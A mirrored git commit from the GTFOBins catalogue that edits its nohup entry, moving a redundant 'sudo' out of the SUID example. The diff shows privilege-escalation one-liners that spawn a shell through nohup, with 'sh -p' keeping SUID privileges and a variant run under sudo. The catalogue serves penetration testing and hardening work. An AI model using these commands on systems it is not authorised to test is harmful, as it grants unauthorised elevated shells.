mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Remove redundant sudo from SUID category in nohup
This commit is contained in:
parent
211edf746b
commit
a48303c2b9
@ -7,8 +7,8 @@ functions:
|
|||||||
COMMAND='/usr/bin/id'
|
COMMAND='/usr/bin/id'
|
||||||
nohup "$COMMAND"
|
nohup "$COMMAND"
|
||||||
cat nohup.out
|
cat nohup.out
|
||||||
sudo:
|
|
||||||
- code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
|
||||||
suid:
|
suid:
|
||||||
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
- code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||||
|
sudo:
|
||||||
|
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user